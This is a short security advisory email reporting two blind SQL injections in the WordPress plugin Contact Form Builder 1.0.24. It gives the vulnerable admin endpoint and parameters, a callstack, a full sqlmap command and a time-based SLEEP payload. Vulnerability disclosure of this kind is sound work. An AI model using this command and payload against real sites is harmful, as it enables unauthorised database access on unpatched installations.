Subject: Blind SQL injections in Contact Form Builder 1.0.24
Date: Tue, 7 Jul 2015 12:14:52 +0200

Hello,

Plugin: Contact Form Builder 1.0.24 

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).


1. SQL injection (CFMModelBlocked_ips_cfm::get_rows_data())

Method: POST
Url: http://localhost/wp-admin/admin.php?page=blocked_ips_cfm
Parameters: order_by, asc_or_desc

Example PHP callstack:

Callstack: 
  CFMModelBlocked_ips_cfm::get_rows_data   [/contact-form-builder/admin/models/CFMModelBlocked_ips_cfm.php:33]
  wpdb::get_results

Sqlmap verification: 

sqlmap --cookie "..." --dbms mysql --method POST --data "order_by=ip&asc_or_desc=asc" -u http://localhost/wp-admin/admin.php?page=blocked_ips_cfm -p order_by

...
Parameter: order_by (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: order_by=ip AND (SELECT * FROM (SELECT(SLEEP(5)))sUkE)&asc_or_desc=asc
...

Please note that there have to be at least 1 record in wp_contactformmaker_blocked table to succesfully execute sqlmap payloads.



2. SQL injection (CFMModelManage_cfm::get_rows_data())

Analogical to #1 SQL injection, both methods are almost identical.

/contact-form-builder/admin/models/CFMModelManage_cfm.php:33


--
Regards,
Marcin Probola,
https://pl.wordpress.org/plugins/contact-form-builder/